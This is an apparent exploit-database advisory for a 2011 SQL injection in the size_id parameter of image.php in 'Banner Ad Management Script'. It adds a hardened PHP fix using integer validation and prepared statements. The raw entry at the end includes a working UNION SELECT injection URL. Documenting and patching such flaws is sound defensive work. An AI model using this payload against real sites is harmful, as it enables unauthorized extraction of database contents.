Vendor: Banner Ad Management Script
Author: Egyptian.H4x0rz
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Banner Ad Management Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Web Apps
Year: 2011

Banner Ad Management Script [ Sql Injection Vulnerability]

The `size_id` parameter of `image.php` is passed to a SQL query without validation or parameterization. An attacker who supplies a crafted value in that parameter can alter the query and extract information from the database.

Mitigation:

Validate the `size_id` parameter as the integer it is expected to be and pass it to the database through a parameterized query (prepared statement) rather than by string concatenation. Sanitizing input alone is weaker than parameterization, because the bound value can never change the structure of the SQL statement.
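A hardened version of the `size_id` handling in `image.php`, as an added example; this is not the vendor's code, and the table and column names (`banner_sizes`, `image_path`) and the connection details are assumptions:

```php
<?php
// Added example, not the vendor's code. Table/column names and the
// connection settings below are assumptions for illustration.
declare(strict_types=1);

// Vulnerable pattern (for contrast only): the raw GET value is spliced into
// the SQL text, so a value like "-1 union select ..." becomes part of the
// statement and can add a UNION with attacker-chosen columns.
//   $sql = "SELECT image_path FROM banner_sizes WHERE size_id = " . $_GET['size_id'];

function loadBannerImagePath(PDO $db, string $rawSizeId): ?string
{
    // 1. Validate: size_id is a row identifier, so only a positive integer is
    //    acceptable. FILTER_VALIDATE_INT rejects "-1 union select ...",
    //    "1 OR 1=1", "" and anything else that is not a plain integer.
    $sizeId = filter_var($rawSizeId, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($sizeId === false) {
        return null; // caller answers 404; do not echo the rejected value back
    }

    // 2. Parameterize: the value is sent separately from the SQL text, so it
    //    cannot change the statement's structure (no new UNION, no extra columns).
    $stmt = $db->prepare('SELECT image_path FROM banner_sizes WHERE size_id = :size_id');
    $stmt->bindValue(':size_id', $sizeId, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['image_path'];
}

// Assumed MySQL connection (the original advisory's payload targets MySQL).
// Emulated prepares are disabled so the server, not the driver, binds values.
$db = new PDO('mysql:host=localhost;dbname=banner_ads;charset=utf8mb4', 'app_user', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$path = loadBannerImagePath($db, (string) ($_GET['size_id'] ?? ''));
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: image/png');
readfile($path); // path comes from the database row, not from the request
```

The validation step alone would already stop the payload shown in this advisory; the prepared statement is what keeps the query safe even when a parameter legitimately has to accept free-form text.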

Exploit-DB raw data:

####################################################################
[+] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 02-04-2011
[+] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php
[+] category: Web Apps [SQli]
[+] HomePage : Black-hat.cc
####################################################################
Vulnerability:

*SQL injection Vulnerability*

[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
~
[#] eXample
http://www.site.com/ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11


####################################################################